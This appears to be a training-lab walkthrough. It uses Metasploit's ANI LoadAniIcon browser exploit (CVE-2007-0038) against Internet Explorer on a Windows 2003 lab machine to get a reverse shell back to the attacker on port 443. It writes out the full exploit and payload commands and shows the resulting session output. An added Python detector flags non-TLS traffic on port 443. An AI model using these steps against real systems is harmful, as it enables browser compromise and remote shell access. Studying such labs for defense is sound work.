2011-BR


CLIENT SIDE ATTACK


Configuration:

Your machine is HACKER, running Windows XP Professional.
The IP address of your machine is 192.168.100.66/24.
Your target machine is WIN2003, running Windows 2003.
The IP address of target machine is 192.168.100.1/24.

Objectives:

Perform a client-side attack by exploiting Internet Explorer on the target and obtaining a
reverse shell connection back to the attacker over TCP port 443 (the port normally used for SSL/HTTPS).

Tools:

Metasploit 3.3

Preparation:

Ensure that the HACKER and WIN2003 virtual machines are connected to the same network.
Log on to the HACKER virtual machine and test connectivity between the two machines
with a standard PING command.

Exploiting Internet Explorer
Detailed Steps:

1. On the HACKER machine, launch Metasploit Framework 3.3 by navigating to c:\msf3 and
running msfweb.bat, or use msfconsole.bat if you do not want the web interface.

2. After Metasploit has loaded in the browser, click on Console.

msf > show exploits

This displays all available exploits. In the list, look for the module related to the browser:

windows/browser/ani_loadimage_chunksize   Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP)

3. Now take a look at the exploit information:

msf > info windows/browser/ani_loadimage_chunksize

       Name: Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP)
    Version: 5773
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)

Provided by:
  hdm <hdm@metasploit.com>
  skape <mmiller@hick.org>
  Solar Eclipse solareclipse@phreedom.org
  H D Moore <hdm[at]metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista
  1   IE6 on Windows NT, 2000, XP, 2003 (all languages)
  2   IE7 on Windows XP SP2, 2003 SP1, SP2 (all languages)
  3   IE7 and Firefox on Windows Vista (all languages)
  4   Firefox on Windows XP (English)
  5   Firefox on Windows 2003 (English)

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host to listen on.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Use SSL
  URIPATH                   no        The URI to use for this exploit (default is random)

Payload information:
  Space: 1824

Description:
  This module exploits a buffer overflow vulnerability in the LoadAniIcon() function
  in USER32.dll. The flaw can be triggered through Internet Explorer 6 and 7 by using
  the CURSOR style sheet directive to load a malicious .ANI file. The module can also
  exploit Mozilla Firefox by using a UNC path in a moz-icon URL and serving the .ANI
  file over WebDAV. The vulnerable code in USER32.dll will catch any exceptions that
  occur while the invalid cursor is loaded, causing the exploit to silently fail when
  the wrong target has been chosen. This vulnerability was discovered by Alexander
  Sotirov of Determina and was rediscovered, in the wild, by McAfee.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-0038
  http://www.securityfocus.com/bid/23194
  http://www.microsoft.com/technet/security/advisory/935423.mspx
  http://www.determina.com/security.research/vulnerabilities/ani-header.html

4. Use that exploit :

msf > use windows/browser/ani_loadimage_chunksize

5. Then show the payloads available :

msf exploit(ani_loadimage_chunksize) > show payloads

6. Then select the windows/shell_reverse_tcp payload:

msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell_reverse_tcp


7. Show all of the options needed by the exploit and payload:

msf exploit(ani_loadimage_chunksize) > show options

Module options:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host to listen on.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Use SSL
  URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/shell_reverse_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  process          yes       Exit technique: seh, thread, process
  LHOST                      yes       The local address
  LPORT     4444             yes       The local port

8. Then set the options:

msf exploit(ani_loadimage_chunksize) > set SRVHOST 192.168.100.66
SRVHOST => 192.168.100.66

msf exploit(ani_loadimage_chunksize) > set SRVPORT 80
SRVPORT => 80

msf exploit(ani_loadimage_chunksize) > set URIPATH you_win.html
URIPATH => you_win.html

msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.100.66
LHOST => 192.168.100.66

msf exploit(ani_loadimage_chunksize) > set LPORT 443
LPORT => 443

We have now configured a fake web server on port 80 that serves a fake page named
you_win.html. When a client opens that link and the exploit succeeds, the payload on the
victim connects back to 192.168.100.66 on port 443. Port 443 is normally used for
SSL/HTTPS, which is why outbound firewalls tend to allow it; note, however, that
windows/shell_reverse_tcp does not encrypt anything (the module's SSL option only affects
the web server side). Only the port is borrowed from SSL, so the shell traffic is
cleartext on the wire.

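The point about port 443 is worth checking on the wire. A real HTTPS client starts every connection with a TLS ClientHello record, whereas the cmd.exe started by windows/shell_reverse_tcp sends its cleartext banner as soon as the socket is up. The Python below is an added example, not part of the lab: it classifies the first bytes a client sends on a flow as a TLS ClientHello, some other TLS record, printable cleartext or unknown binary, and reports every flow to port 443 that did not start with a ClientHello. The flow records and byte strings are constructed to mirror this lab's addresses (192.168.100.1 connecting to 192.168.100.66:443) and are not real captures.

```python
def classify_first_client_bytes(data):
    """Label the first bytes a TCP client sent on a flow.

    A TLS record starts with content type (0x16 = handshake), version major 0x03,
    a minor version and a 2-byte length; a handshake record then carries the
    handshake type (0x01 = ClientHello) and a 3-byte handshake length that must
    equal the record length minus the 4-byte handshake header.
    """
    if len(data) >= 9 and data[0] == 0x16 and data[1] == 0x03 and data[2] <= 0x04:
        record_len = int.from_bytes(data[3:5], "big")
        handshake_len = int.from_bytes(data[6:9], "big")
        if data[5] == 0x01 and handshake_len + 4 == record_len:
            return "tls-client-hello"
        return "tls-other"
    if not data:
        return "empty"
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    if printable / len(data) > 0.9:
        return "cleartext"
    return "unknown-binary"


def find_suspicious_443_flows(flows):
    """Return (src, dst, label) for every flow to port 443 that did not open with a ClientHello."""
    alerts = []
    for src, dst, first_bytes in flows:
        if not dst.endswith(":443"):
            continue
        label = classify_first_client_bytes(first_bytes)
        if label != "tls-client-hello":
            alerts.append((src, dst, label))
    return alerts


# Constructed samples, not captures.
# Record length 0x2c = 44 = 4-byte handshake header + 0x28 bytes of ClientHello body.
TLS_CLIENT_HELLO = b"\x16\x03\x01\x00\x2c\x01\x00\x00\x28" + b"\x03\x03" + b"\x00" * 38
# What a Windows 2003 cmd.exe prints when its stdio is attached to the reverse socket.
REVERSE_SHELL_BANNER = (b"Microsoft Windows [Version 5.2.3790]\r\n"
                        b"(C) Copyright 1985-2003 Microsoft Corp.\r\n\r\n"
                        b"C:\\Documents and Settings\\Administrator\\Desktop>")

SAMPLE_FLOWS = [
    ("192.168.100.1:1317", "192.168.100.66:443", REVERSE_SHELL_BANNER),
    ("192.168.100.1:1320", "192.168.100.66:443", TLS_CLIENT_HELLO),
    ("192.168.100.1:1316", "192.168.100.66:80", b"GET /you_win.html HTTP/1.1\r\n"),
]

if __name__ == "__main__":
    for alert in find_suspicious_443_flows(SAMPLE_FLOWS):
        print("non-TLS traffic on 443:", alert)
```

The classifier only looks at the first bytes in the client-to-server direction, which is enough here because in a reverse shell the victim is the TCP client and speaks first. Legitimate non-TLS services on 443 do exist, so in practice the "cleartext" label is a triage signal rather than a verdict.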

9. Launch the exploit:

msf exploit(ani_loadimage_chunksize) > exploit

10. In this state Metasploit is waiting for a connection and has generated the hyperlink
http://192.168.100.66:80/you_win.html

11. Go to your WIN2003 machine and open that hyperlink with Internet Explorer.


12. As you can see, Internet Explorer 6 hangs. This is normal: the exploit has hijacked the
browser's thread to run the payload, so the window stops responding. Go back to Metasploit
and you will see something similar to this:

[*] Exploit running as background job.
[*] Started reverse handler
[*] Using URL: http://192.168.100.66:80/you_win.html
[*] Server started.
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.100.1:1316...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.100.1:1316...
[*] Command shell session 1 opened (192.168.100.66:443 -> 192.168.100.1:1317)


The exploit worked and one shell session is open. Now interact with that session:

msf exploit(ani_loadimage_chunksize) > sessions -i 1

13. Congratulations!
